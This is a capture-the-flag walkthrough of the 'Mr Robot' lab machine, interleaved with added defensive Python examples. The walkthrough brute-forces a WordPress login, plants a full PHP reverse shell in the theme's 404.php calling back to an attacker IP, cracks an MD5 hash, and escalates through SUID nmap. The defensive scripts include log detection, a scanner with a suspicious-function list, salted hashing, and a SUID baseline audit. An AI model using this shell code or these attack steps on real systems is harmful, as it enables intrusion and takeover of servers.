# Mr Robot

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*DYIwdvqZaDaBg-FoeOWSRg.png" alt="" height="363" width="700"><figcaption></figcaption></figure>

## Setup <a href="#f26c" id="f26c"></a>

Make sure your virtual machine is on NAT.

First, let's perform a ping sweep to identify the machine's IP:

```
for i in {1..255}; do ping -c 1 192.168.23.$i | grep "64 bytes" & done
```

I was able to get a hit on 192.168.23.140.

## Reconnaissance. <a href="#id-0df2" id="id-0df2"></a>

To confirm it, let's run rustscan to identify any open ports:

```
rustscan -a 192.168.23.140
```

<figure><img src="https://miro.medium.com/v2/resize:fit:791/1*1vqQqLhLUw_Q6egegqOwag.png" alt="" height="641" width="633"><figcaption></figcaption></figure>

Nice! So we can see that port 80 is open. Let's check it out.

## Port 80 <a href="#id-08b3" id="id-08b3"></a>

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*XFkOnHfAHzaJmxuqZUf8Zg.png" alt="" height="320" width="700"><figcaption></figcaption></figure>

## Vulnerability Recon <a href="#id-1712" id="id-1712"></a>

After digging through the website I wasn't able to find anything useful. Let's run nmap with the `vuln` script category to look for known vulnerabilities on the open ports:

```
nmap --script vuln 192.168.23.140
```

<figure><img src="https://miro.medium.com/v2/resize:fit:764/1*XApUfMeSQsLXLrs4rFEGSg.png" alt="" height="548" width="611"><figcaption></figcaption></figure>

Alright, now we have something to work with. As the output shows, there is a `robots.txt` along with possible admin and WordPress directories (this tells us that this is a WordPress site).

Let's check out the `robots.txt`:

<figure><img src="https://miro.medium.com/v2/resize:fit:775/1*TOq5zxZckPkac6-2dABfIA.png" alt="" height="219" width="620"><figcaption></figcaption></figure>

Nice, so we were able to get 1/3 keys on this machine (not too hard).

## 1/3 Key <a href="#id-1d7d" id="id-1d7d"></a>

**Key : 073403c8a58a1f80d943455fb30724b9**

## Wordlist <a href="#id-7186" id="id-7186"></a>

Alright, so referring back to the `robots.txt`, there is also a `.dic` file, which is supposedly a wordlist. This hints that some brute-forcing could be involved, so I downloaded it to my local machine using:

```
wget http://192.168.23.140/fsocity.dic
```

The file is quite large and I also noticed that it has a lot of repeated lines, so let's clean it up by keeping only one copy of each:

```
sort fsocity.dic | uniq > fsocity_filtered.dic
```

Alright, so we've got a wordlist.

## WordPress login <a href="#id-9831" id="id-9831"></a>

Referring back to the nmap scan results, we can notice a `wp-login.php`, which is the standard WordPress login form.

<figure><img src="https://miro.medium.com/v2/resize:fit:619/1*K30jXv_suSlPpjenx3ylEw.png" alt="" height="518" width="495"><figcaption></figcaption></figure>

I tried some default credentials, but nothing worked. Let's not waste time on that, since it's quite obvious that we would have to brute-force this with the wordlist found earlier.

After some attempts at brute-forcing the login page via Burp Intruder I wasn't getting anywhere. I also scavenged the website for any usernames but got nothing.

That is when grok.com suggested that I use Mr. Robot character names for the username field, which makes sense. So I told Grok to generate a list of the characters in Mr. Robot and loaded it into Burp Intruder.

## Brute Forcing Process. <a href="#f87e" id="f87e"></a>

We first capture a login request via Burp's proxy, send it to Intruder and mark the two parameters (username and password) as payload positions.

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*dG8Nwg4ZoUegNrtHkIX-Ow.png" alt="" height="264" width="700"><figcaption></figcaption></figure>

After that's done, I set payload 1 (username) to the character list and payload 2 (password) to the filtered wordlist.

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*-spAXh4s0_E2STSc0OYMzA.png" alt="" height="303" width="700"><figcaption></figcaption></figure>

As you can see, I got a small change in content length on `elliot`, which could hint that this is a valid username. This was double-checked when the login form said that the `password for this username is wrong`.

This helped me shortlist it and fuzz passwords with the username set to `elliot`. We finally got a hit on the password:

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*bsw6oph52iQXKtSs1huC9A.png" alt="" height="313" width="700"><figcaption></figcaption></figure>

The credentials are **elliot : ER28-0652**
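The content-length difference and the `password for this username is wrong` message are the defender-relevant details here: WordPress answers an unknown username and a wrong password differently, which is what makes the two-stage approach above cheap, and it answers a failed `wp-login.php` POST with a 200 (the form again) but a correct one with a 302 redirect into `wp-admin`. From the server side the same activity is plainly visible in the access log. The script below is an added example, not part of the original write-up, that runs a simple detection over constructed combined-format log lines: it flags any IP that POSTs to `wp-login.php` at least a threshold number of times inside a time window, and marks the burst as successful when a 302 follows the run of 200s. The log lines, the IPs (documentation ranges, not lab hosts) and the thresholds are all constructed for the example.

```python
"""Detect wp-login.php brute forcing in combined-format access logs.

Added example, not part of the original write-up. SAMPLE_LOG is constructed;
the IPs are documentation-range placeholders, not hosts from the lab.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined log format: ip ident user [time] "METHOD path proto" status bytes "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample: one host fails eight logins in eight seconds and then gets a
# 302 (success); another host logs in normally; one line is not a log entry at all.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2025:10:00:00 +0000] "GET /wp-login.php HTTP/1.1" 200 3114 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2025:10:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 4821 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2025:10:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 4821 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2025:10:00:03 +0000] "POST /wp-login.php HTTP/1.1" 200 4821 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2025:10:00:04 +0000] "POST /wp-login.php HTTP/1.1" 200 4821 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2025:10:00:05 +0000] "POST /wp-login.php HTTP/1.1" 200 4821 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2025:10:00:06 +0000] "POST /wp-login.php HTTP/1.1" 200 4821 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2025:10:00:07 +0000] "POST /wp-login.php HTTP/1.1" 200 4821 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2025:10:00:08 +0000] "POST /wp-login.php HTTP/1.1" 200 4821 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2025:10:00:09 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Mar/2025:10:05:00 +0000] "POST /wp-login.php HTTP/1.1" 200 4821 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Mar/2025:10:05:20 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Mar/2025:10:05:21 +0000] "GET /wp-admin/ HTTP/1.1" 200 51200 "-" "Mozilla/5.0"
this line is not a log entry
"""


def parse_line(line):
    """Return the fields needed for detection, or None for lines that do not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "time": datetime.strptime(m["time"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],  # ignore query strings such as ?action=...
        "status": int(m["status"]),
    }


def find_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Flag IPs that POST to /wp-login.php at least `threshold` times within `window`.

    Returns {ip: {"attempts": total_posts, "succeeded": bool}} for flagged IPs only.
    `succeeded` is True when a 302 (WordPress's redirect after a correct login)
    appears at or after the start of the burst; that is the case worth paging on.
    """
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == "/wp-login.php":
            per_ip[rec["ip"]].append((rec["time"], rec["status"]))

    flagged = {}
    for ip, events in per_ip.items():
        events.sort()
        burst_start = None
        left = 0
        for right, (ts, _status) in enumerate(events):
            # slide the left edge so the window holds only events within `window` of ts
            while ts - events[left][0] > window:
                left += 1
            if right - left + 1 >= threshold:
                burst_start = events[left][0]
                break
        if burst_start is None:
            continue
        succeeded = any(st == 302 and ts >= burst_start for ts, st in events)
        flagged[ip] = {"attempts": len(events), "succeeded": succeeded}
    return flagged


if __name__ == "__main__":
    for ip, info in find_bruteforce(SAMPLE_LOG).items():
        state = "SUCCESSFUL" if info["succeeded"] else "ongoing"
        print(f"{ip}: {info['attempts']} wp-login.php POSTs, {state}")
```

On a real host the same function can be fed the live log; the threshold and window are the knobs to tune, and a flagged IP whose burst ends in a 302 is the one that needs a password reset and session invalidation, not just a block.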

## WordPress Recon <a href="#e5ef" id="e5ef"></a>

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*4RAB1WVkygCYC5UVhkmnWA.png" alt="" height="304" width="700"><figcaption></figcaption></figure>

Sweet, we got into the wp-admin dashboard. Now let's dig in from here.

After some digging around I was unable to find any direct exploits for the installed plugins, so I thought of checking out the `Users` section, as it could hold some potentially useful information.

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*PHy0KGQ_uxSHmYPLc-gn6g.png" alt="" height="191" width="700"><figcaption></figcaption></figure>

Alright, we got a new user called `mich05654`, which is also another character in Mr. Robot. Let's check her out.

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*_K4wmICHgmHK7xTmMFIrBQ.png" alt="" height="492" width="700"><figcaption></figcaption></figure>

Okay, so we got a small hint saying `another key?` in her bio, which could mean she is holding onto the second key. So let's log in to her account by generating a new password for it.

## Reverse shell | Web page editor <a href="#id-45bc" id="id-45bc"></a>

Well, after logging in as `mich05654` I didn't find anything useful, as she was a normal user; only elliot was admin.

I logged back in as elliot and noticed a file editor option under the Appearance tab.

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*vQtSCYHYLNyrg6wbeQCPXw.png" alt="" height="301" width="700"><figcaption></figcaption></figure>

Nice, so technically I could inject reverse shell code into any of the theme's .php files, and when that file is rendered it would give me a shell on the server.

For this I chose the `404.php` file and edited it as follows:

## Shell Code <a href="#id-3f3e" id="id-3f3e"></a>

```
<?php
/**
 * The template for displaying 404 pages (not found)
 *
 * @package WordPress
 * @subpackage Twenty_Fifteen
 * @since Twenty Fifteen 1.0
 */

get_header(); ?>

    <div id="primary" class="content-area">
        <main id="main" class="site-main" role="main">

            <section class="error-404 not-found">
                <header class="page-header">
                    <h1 class="page-title"><?php _e( 'Oops! That page can’t be found.', 'twentyfifteen' ); ?></h1>
                </header><!-- .page-header -->

                <div class="page-content">
                    <p><?php _e( 'It looks like nothing was found at this location. Maybe try a search?', 'twentyfifteen' ); ?></p>

                    <?php get_search_form(); ?>
                </div><!-- .page-content -->
            </section><!-- .error-404 -->

        </main><!-- .site-main -->
    </div><!-- .content-area -->

<?php
// Reverse shell code
$ip = "192.168.23.138";  // Your local IP
$port = 4444;            // Your chosen port

// Attempt to create a reverse shell
$sock = @fsockopen($ip, $port, $errno, $errstr, 5);  // 5-second timeout
if ($sock) {
    $descriptorspec = array(
        0 => array("pipe", "r"),  // stdin
        1 => array("pipe", "w"),  // stdout
        2 => array("pipe", "w")   // stderr
    );
    $process = proc_open('/bin/sh -i', $descriptorspec, $pipes, null, null);
    if (is_resource($process)) {
        stream_set_blocking($sock, 0);
        foreach ($pipes as $pipe) {
            stream_set_blocking($pipe, 0);
        }
        fwrite($pipes[0], "whoami\n");  // Test command
        while (!feof($sock)) {
            fwrite($pipes[0], fread($sock, 1024));
            fwrite($sock, fread($pipes[1], 1024));
            fwrite($sock, fread($pipes[2], 1024));
        }
        foreach ($pipes as $pipe) {
            fclose($pipe);
        }
        proc_close($process);
    }
    fclose($sock);
}
?>
<?php get_footer(); ?>
```

I saved my changes, opened a netcat listener (`nc -nvlp 4444`) and visited a non-existent web page, which makes WordPress render the edited 404 template.

Solid! So now I was doing some digging through the directories and found out about the user `robot`; that user's home directory contains the following files.

You can get a better, more interactive shell by running `python -c 'import pty; pty.spawn("/bin/bash")'`.
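The theme editor is a stock Appearance feature of the WordPress admin, so any administrator account (here, elliot's brute-forced one) can turn a template into a shell the way the `404.php` above does. Two defensive checks follow directly from that. The script below is an added example, not part of the original write-up or of WordPress itself: it checks `wp-config.php` for `define('DISALLOW_FILE_EDIT', true);`, the documented WordPress constant that removes the theme and plugin editors from the dashboard, and it scans theme `.php` files for functions a template never legitimately calls (`fsockopen`, `proc_open`, `shell_exec`, ...), which is exactly what the modified template contains. The sample site it builds in a temp directory, the indicator list and the file layout are constructed for the example.

```python
"""Audit a WordPress install for an enabled theme editor and tampered theme files.

Added example, not part of the original write-up. build_sample_site() writes a
constructed miniature install into a temp directory so the checks run offline.
"""
import os
import re
import tempfile

# Functions a theme template has no business calling. Any hit is worth a look;
# fsockopen + proc_open together is the signature of the 404.php shown above.
SUSPICIOUS = re.compile(
    r"\b(fsockopen|proc_open|popen|shell_exec|passthru|exec|system|eval|base64_decode)\s*\("
)

# define('DISALLOW_FILE_EDIT', true); in any spacing/quoting/case WordPress accepts
FILE_EDIT_DISABLED = re.compile(
    r"""define\s*\(\s*['"]DISALLOW_FILE_EDIT['"]\s*,\s*true\s*\)""", re.IGNORECASE
)


def file_edit_disabled(wp_config_text):
    """True when wp-config.php removes the theme/plugin editors from the dashboard."""
    return bool(FILE_EDIT_DISABLED.search(wp_config_text))


def scan_php_files(root):
    """Map each .php file under `root` (relative path) to the suspicious calls it contains."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = sorted(set(SUSPICIOUS.findall(fh.read())))
            if hits:
                findings[os.path.relpath(path, root)] = hits
    return findings


def audit_site(site_root):
    """Run both checks against a WordPress install rooted at `site_root`."""
    with open(os.path.join(site_root, "wp-config.php"), encoding="utf-8") as fh:
        config = fh.read()
    themes = os.path.join(site_root, "wp-content", "themes")
    return {
        "editor_disabled": file_edit_disabled(config),
        "suspicious_files": scan_php_files(themes),
    }


def build_sample_site(disallow_file_edit=False):
    """Constructed install: one clean theme, one with a tampered 404.php, a wp-config."""
    root = tempfile.mkdtemp(prefix="wp-sample-")
    clean = os.path.join(root, "wp-content", "themes", "twentyfifteen")
    tampered = os.path.join(root, "wp-content", "themes", "twentysixteen")
    os.makedirs(clean)
    os.makedirs(tampered)
    template = "<?php get_header(); ?>\n<h1>Not found</h1>\n"
    with open(os.path.join(clean, "404.php"), "w") as fh:
        fh.write(template + "<?php get_footer(); ?>\n")
    with open(os.path.join(tampered, "404.php"), "w") as fh:
        fh.write(template + "<?php\n"
                 "$sock = @fsockopen($ip, $port);\n"
                 "$p = proc_open('/bin/sh -i', $spec, $pipes);\n"
                 "get_footer(); ?>\n")
    config = "<?php\ndefine('DB_NAME', 'wordpress');\n"
    if disallow_file_edit:
        config += "define('DISALLOW_FILE_EDIT', true);\n"  # the hardening line
    with open(os.path.join(root, "wp-config.php"), "w") as fh:
        fh.write(config)
    return root


if __name__ == "__main__":
    for hardened in (False, True):
        report = audit_site(build_sample_site(disallow_file_edit=hardened))
        print(f"editor disabled: {report['editor_disabled']}")
        for path, calls in report["suspicious_files"].items():
            print(f"  {path}: {', '.join(calls)}")
```

Disabling the editor does not undo an edit that has already happened, so the file scan (or, better, a hash comparison against a pristine copy of the theme) is the check that catches the case on this page; the constant only closes the door for next time.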

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*Hm_DdtL40uvZ8nvQMtwXUQ.png" alt="" height="546" width="700"><figcaption></figcaption></figure>

So we cannot read the key directly, but we can read robot's hashed password.

<figure><img src="https://miro.medium.com/v2/resize:fit:644/1*OJ5WC-ieAucWrp2UjaVcPw.png" alt="" height="143" width="515"><figcaption></figcaption></figure>

```
robot : c3fcd3d76192e4007dfb496cca67e13b
```

I was able to crack the password using CrackStation:

<https://crackstation.net/>

**robot : abcdefghijklmnopqrstuvwxyz**
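The `robot` password came out of CrackStation instantly because it was an unsalted MD5 of a dictionary string: a lookup service hashes every word once and then answers any such hash with a dictionary lookup. The script below is an added example, not from the original write-up. It reproduces that lookup against a tiny constructed wordlist, confirms that the hash shown above is the MD5 of the 26-letter alphabet, and then shows the storage form that defeats the lookup: a random per-user salt plus a slow KDF (PBKDF2-HMAC-SHA256 via `hashlib`), where even the same password yields a different record every time, so no precomputed table applies. The wordlist, iteration count and record format are constructed for the example.

```python
"""Why an unsalted MD5 was trivial to recover, and what to store instead.

Added example, not part of the original write-up. WORDLIST is constructed;
ROBOT_HASH is the hash shown on the page for the `robot` user.
"""
import hashlib
import hmac
import os

ROBOT_HASH = "c3fcd3d76192e4007dfb496cca67e13b"

# Constructed mini wordlist standing in for a lookup service's table.
WORDLIST = ["password", "letmein", "abcdefghijklmnopqrstuvwxyz", "qwerty"]


def md5_table(words):
    """Precompute md5 -> word once; this is the service's whole investment."""
    return {hashlib.md5(w.encode()).hexdigest(): w for w in words}


def lookup_unsalted(hex_digest, table):
    """An unsalted hash is just a key into that table: one dict lookup recovers the word."""
    return table.get(hex_digest.lower())


def store_password(password, iterations=200_000):
    """Salted, slow storage: random 16-byte salt, PBKDF2-HMAC-SHA256, self-describing record."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError(f"unsupported record: {algo}")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    table = md5_table(WORDLIST)
    print("unsalted md5 lookup ->", lookup_unsalted(ROBOT_HASH, table))
    rec1 = store_password("abcdefghijklmnopqrstuvwxyz")
    rec2 = store_password("abcdefghijklmnopqrstuvwxyz")
    print("same password, two records differ:", rec1 != rec2)
    print("verify correct password:", verify_password("abcdefghijklmnopqrstuvwxyz", rec1))
```

The salt is what makes the table useless (every user would need their own table) and the iteration count is what makes building one per user expensive; both are needed, and neither applies to the plain `md5(password)` the machine stored.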

Now let's log in as robot and capture the flag. :) (login via the VM)

<figure><img src="https://miro.medium.com/v2/resize:fit:803/1*jC_eDH1kawQEmtuj06DcRA.png" alt="" height="421" width="642"><figcaption></figcaption></figure>

## 2/3 Key <a href="#id-65d0" id="id-65d0"></a>

**Key : 822c73956184f694993bede3eb39f959**

## Privilege Escalation <a href="#id-2143" id="id-2143"></a>

Alright, now let's get our hands dirty with privesc. First, let's check for SUID binaries: files that run with their owner's privileges (usually root's) no matter which user executes them.

```
find / -perm -u=s -type f 2>/dev/null
```

## Nmap <a href="#id-50df" id="id-50df"></a>

<figure><img src="https://miro.medium.com/v2/resize:fit:593/1*Ce8xKtlBkLx9j-xQPsev_g.png" alt="" height="224" width="474"><figcaption></figcaption></figure>

Interesting! We got nmap as a SUID binary, so let's check its version. The version is 3.81. I believe we can exploit this binary using GTFOBins.

<https://gtfobins.github.io/gtfobins/nmap/>

Let's attempt to establish an interactive shell using the following commands:

```
nmap --interactive
nmap > !sh
```
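The `find` one-liner above is the attacker's view; the defender's counterpart is the same enumeration run on a schedule and diffed against an approved baseline, so that an unexpected setuid binary like this nmap shows up as a finding instead of a surprise. The script below is an added example, not from the original write-up: it re-implements `find ROOT -perm -u=s -type f` in Python, reports paths relative to the scanned root, and diffs them against a baseline set. The baseline, the sample filesystem it builds in a temp directory and the placeholder files are all constructed; on a real host you would point `find_suid_files` at `/` and keep the baseline under version control.

```python
"""Enumerate setuid files and diff them against an approved baseline.

Added example, not part of the original write-up. BASELINE and the sample
filesystem from build_sample_root() are constructed for the demonstration.
"""
import os
import stat
import tempfile

# Constructed baseline: the setuid binaries this (hypothetical) host is allowed to have.
BASELINE = {"/bin/su", "/usr/bin/passwd", "/usr/bin/sudo"}


def find_suid_files(root):
    """Python equivalent of `find ROOT -perm -u=s -type f`.

    Paths are returned relative to `root` with a leading slash, so a scan of a
    temp copy or a mounted image compares directly against BASELINE.
    """
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks, like find's default
            except OSError:
                continue  # unreadable entry; find would print an error and move on
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append("/" + os.path.relpath(path, root))
    return sorted(found)


def unexpected_suid(found, baseline=BASELINE):
    """Setuid files that are not in the approved baseline: each one is a finding."""
    return sorted(set(found) - set(baseline))


def build_sample_root():
    """Constructed filesystem image: the three baseline binaries, a setuid nmap, and a normal ls."""
    root = tempfile.mkdtemp(prefix="suid-sample-")
    layout = {
        "bin/su": 0o4755,
        "usr/bin/passwd": 0o4755,
        "usr/bin/sudo": 0o4755,
        "usr/local/bin/nmap": 0o4755,  # the one that should not be there
        "usr/bin/ls": 0o755,           # ordinary binary, must not be reported
    }
    for rel, mode in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")  # placeholder contents; only the mode bits matter
        os.chmod(path, mode)        # chmod after the write so the kernel cannot clear the bit
    return root


if __name__ == "__main__":
    root = build_sample_root()
    found = find_suid_files(root)
    print("setuid files:", found)
    print("not in baseline:", unexpected_suid(found))
```

The diff is only as good as the baseline, so the baseline should come from a freshly installed host of the same image, and every addition to it (a legitimately setuid helper) should be a reviewed change rather than a silent update after the fact.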

<figure><img src="https://miro.medium.com/v2/resize:fit:685/1*lVKtlCbu1F_uBTKR442nXQ.png" alt="" height="158" width="548"><figcaption></figcaption></figure>

Voila, we rooted the machine. Now let's capture the last key.

## 3/3 Key <a href="#id-4571" id="id-4571"></a>

**Key : 04787ddef27c3dee1ee161b21670b4e4**

